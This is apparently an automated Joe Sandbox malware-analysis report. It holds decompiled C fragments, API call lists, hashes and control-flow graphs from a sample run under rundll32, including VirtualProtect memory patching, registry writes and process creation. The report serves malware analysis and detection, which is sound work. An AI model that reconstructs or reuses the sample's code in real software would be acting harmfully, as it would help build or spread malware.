                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0x3430000;
                                				_t115 = _t139[3] + 0x3430000;
                                				_t131 = _t139[4] + 0x3430000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0x3430000;
                                				_v16 = _t139[5] + 0x3430000;
                                				_v64 = _a8;
                                				_v72 = 0x24;
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				if(( *_t139 & 0x00000001) == 0) {
                                					_a8 =  &_v72;
                                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                					return 0;
                                				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0x3430002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
                                				_t82 =  *0x343a1c0; // 0x0
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0x343a1c0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0x343a1c0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                								L27:
                                								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
                                									_t90 =  *0x343a1bc; // 0x0
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
                                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0x343a1c0; // 0x0
                                					if(_t98 == 0) {
                                						L9:
                                						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
                                							L13:
                                							if(InterlockedExchange(_v28, _t138) == _t138) {
                                								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0x343a1b8; // 0x0
                                										 *_t102 = _t125;
                                										 *0x343a1b8 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0x343a1bc; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
                                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
                                			}

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03437FAE
                                • LoadLibraryA.KERNEL32(?), ref: 0343802B
                                • GetLastError.KERNEL32 ref: 03438037
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0343806A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: 372e23c6b8b41d88ea8f6e8f93cf7f7f909bf92fb0f38f8123198096c0e463fd
                                • Instruction ID: 642f8a58182dfe0d0bb7c500c21273e51d7abe74ec229604502f8de0b57d6196
                                • Opcode Fuzzy Hash: 372e23c6b8b41d88ea8f6e8f93cf7f7f909bf92fb0f38f8123198096c0e463fd
                                • Instruction Fuzzy Hash: 1C810871A00305AFDB11DFA8D984AEEB7F5BB49310F15802AF945EB340E7B0E909CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E0343661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				void _v48;
                                				long _v52;
                                				struct %anon52 _v60;
                                				char _v72;
                                				long _v76;
                                				void* _v80;
                                				union _LARGE_INTEGER _v84;
                                				struct %anon52 _v92;
                                				void* _v96;
                                				void* _v100;
                                				union _LARGE_INTEGER _v104;
                                				long _v108;
                                				struct %anon52 _v124;
                                				long _v128;
                                				struct %anon52 _t46;
                                				void* _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				struct %anon52 _t66;
                                				intOrPtr _t68;
                                				void* _t69;
                                				void* _t73;
                                				signed int _t74;
                                				void* _t76;
                                				void* _t78;
                                				void** _t82;
                                				signed int _t86;
                                				void* _t89;
                                
                                				_t76 = __edx;
                                				_v52 = 0;
                                				memset( &_v48, 0, 0x2c);
                                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v60 = _t46;
                                				if(_t46 == 0) {
                                					_v92.HighPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x343a2e0);
                                					_v76 = 0;
                                					_v80 = 0;
                                					L0343824A();
                                					_v84.LowPart = _t46;
                                					_v80 = _t76;
                                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                					_t51 =  *0x343a30c; // 0x2cc
                                					_v76 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                					_v108 = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x343a2ec = 5;
                                						} else {
                                							_t69 = E0343216C(_t76); // executed
                                							if(_t69 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v104.LowPart = 0;
                                						L6:
                                						if(_v104.LowPart == 1 && ( *0x343a300 & 0x00000001) == 0) {
                                							_v104.LowPart = 2;
                                						}
                                						_t74 = _v104.LowPart;
                                						_t58 = _t74 << 4;
                                						_t78 = _t89 + (_t74 << 4) + 0x38;
                                						_t75 = _t74 + 1;
                                						_v92.LowPart = _t74 + 1;
                                						_t61 = E034343EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                						_v124 = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v92;
                                						_v104.LowPart = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_t68 = E034370D8(_t75,  &_v72, _a4, _a8); // executed
                                							_v124.HighPart = _t68;
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x343a2e4);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x343a2e8; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E0343561E();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x343a2e8);
                                								L21:
                                								L0343824A();
                                								_v104.LowPart = _t61;
                                								_v100 = _t78;
                                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                								_v128 = _t65;
                                								__eflags = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t82 =  &_v72;
                                					_t73 = 3;
                                					do {
                                						_t54 =  *_t82;
                                						if(_t54 != 0) {
                                							RtlFreeHeap( *0x343a2d8, 0, _t54); // executed
                                						}
                                						_t82 =  &(_t82[4]);
                                						_t73 = _t73 - 1;
                                					} while (_t73 != 0);
                                					CloseHandle(_v80);
                                				}
                                				return _v92.HighPart;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 03436637
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03436643
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0343666B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0343668B
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,03433EE8,?), ref: 034366A6
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000), ref: 0343674D
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000,?,?), ref: 0343675D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 03436797
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 034367B1
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 034367BD
                                  • Part of subcall function 0343216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,055E9400,00000000,?,76CDF710,00000000,76CDF730), ref: 034321BB
                                  • Part of subcall function 0343216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055E9438,?,00000000,30314549,00000014,004F0053,055E93F4), ref: 03432258
                                  • Part of subcall function 0343216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,034366BE), ref: 0343226A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000,?,?), ref: 034367D0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 214b51eb040632bf8af6263c5b9f99752194ae7b112f765c72ef7983e0579d43
                                • Instruction ID: 3ca6448b37db70735544ff2657a8315009fa9721e918c09e81df31098215195a
                                • Opcode Fuzzy Hash: 214b51eb040632bf8af6263c5b9f99752194ae7b112f765c72ef7983e0579d43
                                • Instruction Fuzzy Hash: E9515C71009321BFD710EF159C849AFBBE8EB8A360F544A1EF8A59B290D7748544CF96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 318 3471a0a-3471a2b call 3493d64 321 3471a31-3471a32 318->321 322 3471b0d 318->322 323 3471a34-3471a37 321->323 324 3471a98-3471a9f 321->324 325 3471b13-3471b22 VirtualProtect 322->325 328 3471b64-3471b70 call 3493d9f 323->328 329 3471a3d 323->329 326 3471aa1-3471aa8 324->326 327 3471ae0-3471af5 VirtualProtect 324->327 330 3471b24-3471b3a VirtualProtect 325->330 331 3471b3f-3471b45 GetLastError 325->331 326->327 333 3471aaa-3471ab6 326->333 327->325 335 3471af7-3471b0b 327->335 332 3471a43-3471a4a 329->332 330->332 331->328 336 3471a8c-3471a93 332->336 337 3471a4c-3471a50 332->337 333->325 338 3471ab8-3471ac5 VirtualProtect 333->338 340 3471adc-3471ade VirtualProtect 335->340 336->328 337->336 341 3471a52-3471a6e lstrlen VirtualProtect 337->341 338->325 342 3471ac7-3471adb 338->342 340->325 341->336 343 3471a70-3471a8a lstrcpy VirtualProtect 341->343 342->340 343->336
                                APIs
                                • lstrlen.KERNEL32(?,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471A58
                                • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A6A
                                • lstrcpy.KERNEL32(00000000,?), ref: 03471A79
                                • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A8A
                                • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471AC1
                                • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471ADC
                                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471AF1
                                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471B1E
                                • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471B38
                                • GetLastError.KERNEL32(?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471B3F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                • String ID:
                                • API String ID: 3676034644-0
                                • Opcode ID: 1b964575f0f7eb87c0d0ded52e52f2d978680153d43ee27bf6d505c65257efe9
                                • Instruction ID: 94ebbded3451a1724679acf5465884d73114ed8ea6bef2ac82e8cddf792689d3
                                • Opcode Fuzzy Hash: 1b964575f0f7eb87c0d0ded52e52f2d978680153d43ee27bf6d505c65257efe9
                                • Instruction Fuzzy Hash: 54414D719007099FDB21DFA4CC45EABB7F4FB08350F05861AE652AA6A4E734E805CF68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E034376BB(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L03438244();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x343a348; // 0x21ad5a8
                                				_t5 = _t13 + 0x343b87a; // 0x55e8e22
                                				_t6 = _t13 + 0x343b594; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L03437EAA();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x343a34c, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}
                                Address range: 0x034376bb - 0x0343777d

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?,?), ref: 034376C7
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 034376DD
                                • _snwprintf.NTDLL ref: 03437702
                                • CreateFileMappingW.KERNELBASE(000000FF,0343A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 0343771E
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?), ref: 03437730
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 03437747
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53), ref: 03437768
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?), ref: 03437770
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: f632bd8372a2176a6a4d163c6748225d87b50ebacd124260b9f41ff87d152ea1
                                • Instruction ID: 93093d4fa1c11427b8568bba384829d66fa7ce44977ce75a2ffe94214d08dfd9
                                • Opcode Fuzzy Hash: f632bd8372a2176a6a4d163c6748225d87b50ebacd124260b9f41ff87d152ea1
                                • Instruction Fuzzy Hash: B7210FB2640204BBD310EB68CC45FDE7BF9AB89710F240026FA59FF280D7B0A905CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E03434274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                				_t41 = __edi;
                                				_t37 = __ebx;
                                				_t45 = __eax;
                                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                					E03436E40(_t16, __ecx, 0xea60);
                                				}
                                				_t17 =  *(_t45 + 0x18);
                                				_push(_t37);
                                				_push(_t41);
                                				if(_t17 != 0) {
                                					InternetSetStatusCallback(_t17, 0);
                                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                				}
                                				_t18 =  *(_t45 + 0x14);
                                				if(_t18 != 0) {
                                					InternetSetStatusCallback(_t18, 0);
                                					InternetCloseHandle( *(_t45 + 0x14));
                                				}
                                				_t19 =  *(_t45 + 0x10);
                                				if(_t19 != 0) {
                                					InternetSetStatusCallback(_t19, 0);
                                					InternetCloseHandle( *(_t45 + 0x10));
                                				}
                                				_t20 =  *(_t45 + 0x1c);
                                				if(_t20 != 0) {
                                					FindCloseChangeNotification(_t20); // executed
                                				}
                                				_t21 =  *(_t45 + 0x20);
                                				if(_t21 != 0) {
                                					CloseHandle(_t21);
                                				}
                                				_t22 =  *((intOrPtr*)(_t45 + 8));
                                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                					E03436C2C(_t22);
                                					 *((intOrPtr*)(_t45 + 8)) = 0;
                                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                				}
                                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                					E03436C2C(_t23);
                                				}
                                				_t24 =  *_t45;
                                				if(_t24 != 0) {
                                					_t24 = E03436C2C(_t24);
                                				}
                                				_t46 =  *((intOrPtr*)(_t45 + 4));
                                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                					return E03436C2C(_t46);
                                				}
                                				return _t24;
                                			}
                                Address range: 0x03434274 - 0x03434320

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342A2
                                • InternetCloseHandle.WININET(?), ref: 034342A7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342B2
                                • InternetCloseHandle.WININET(?), ref: 034342B7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342C2
                                • InternetCloseHandle.WININET(?), ref: 034342C7
                                • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,03433801,?,?,76CC81D0,00000000,00000000), ref: 034342D7
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,03433801,?,?,76CC81D0,00000000,00000000), ref: 034342E1
                                  • Part of subcall function 03436E40: WaitForMultipleObjects.KERNEL32(00000002,03437BB5,00000000,03437BB5,?,?,?,03437BB5,0000EA60), ref: 03436E5B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                • String ID:
                                • API String ID: 2172891992-0
                                • Opcode ID: 921256547c1620f10c442890ec879df01b12ed29209c4796b95729fec373b1d8
                                • Instruction ID: bc6133a9a877cfe89cc39f8aa60598ded7dfc84554115a3d8cbb7581eada2b6e
                                • Opcode Fuzzy Hash: 921256547c1620f10c442890ec879df01b12ed29209c4796b95729fec373b1d8
                                • Instruction Fuzzy Hash: 5411CC7A6007486BC530EEABECC4C9BF7EDAB4A25035A0D1EE455EB750C725F8448A68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 401 3483959-3483991 call 348bad1 404 3483993 401->404 405 34839f5-3483a0a WaitForSingleObject 401->405 408 3483996-34839ab call 348a651 404->408 406 3483a10-3483a1e 405->406 407 3483af4-3483b2d RtlExitUserThread 405->407 411 3483ab0-3483ac3 call 3483829 406->411 412 3483a24-3483a45 RegOpenKeyA 406->412 409 3483b2f-3483b3b 407->409 410 3483b40-3483b67 CreateProcessA 407->410 425 34839dc-34839f3 call 348e803 408->425 426 34839ad-34839c4 408->426 409->410 431 3483b3d 409->431 416 3483b69-3483b6f call 3485d7a 410->416 417 3483b74-3483b76 410->417 411->407 429 3483ac5-3483ad4 WaitForSingleObject 411->429 414 3483a6f-3483a72 412->414 415 3483a47-3483a69 RegSetValueExA RegCloseKey 412->415 422 3483a79-3483aad call 348e778 414->422 423 3483a74-3483a77 414->423 415->414 416->417 427 3483b78-3483b79 call 348e803 417->427 428 3483b7e-3483b8c 417->428 422->411 423->411 423->422 425->405 425->408 426->425 438 34839c6-34839d7 call 347f39b 426->438 427->428 429->407 434 3483ad6-3483af1 call 348d30a 429->434 431->410 434->407 438->425
                                APIs
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                • WaitForSingleObject.KERNEL32(00000000,?,06169998,?,00000000,00000000,00000001), ref: 03483A03
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03483A3D
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 03483A60
                                • RegCloseKey.ADVAPI32(?), ref: 03483A69
                                • WaitForSingleObject.KERNEL32(00000000), ref: 03483ACD
                                • RtlExitUserThread.NTDLL(?), ref: 03483B03
                                  • Part of subcall function 0348A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0347148A,?,?,?), ref: 0348A66F
                                  • Part of subcall function 0348A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0347148A,?,?,?), ref: 0348A67F
                                  • Part of subcall function 0348A651: CloseHandle.KERNEL32(000000FF,?,?,0347148A,?,?,?), ref: 0348A6E1
                                • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 03483B5C
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                                • String ID:
                                • API String ID: 3876914104-0
                                • Opcode ID: df71004c4980f6ba5e679b05b772d391517f6d0c3b83ad6800a92d1859430ef0
                                • Instruction ID: 52dc85a55266deb673398b30c8b6b26cf34c749c2c6a5a52fa4018dfef5e578b
                                • Opcode Fuzzy Hash: df71004c4980f6ba5e679b05b772d391517f6d0c3b83ad6800a92d1859430ef0
                                • Instruction Fuzzy Hash: FD614C79A00209AFDF11EF99D885E9EBBF9EB08710F04416BF918EF251D7709911CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
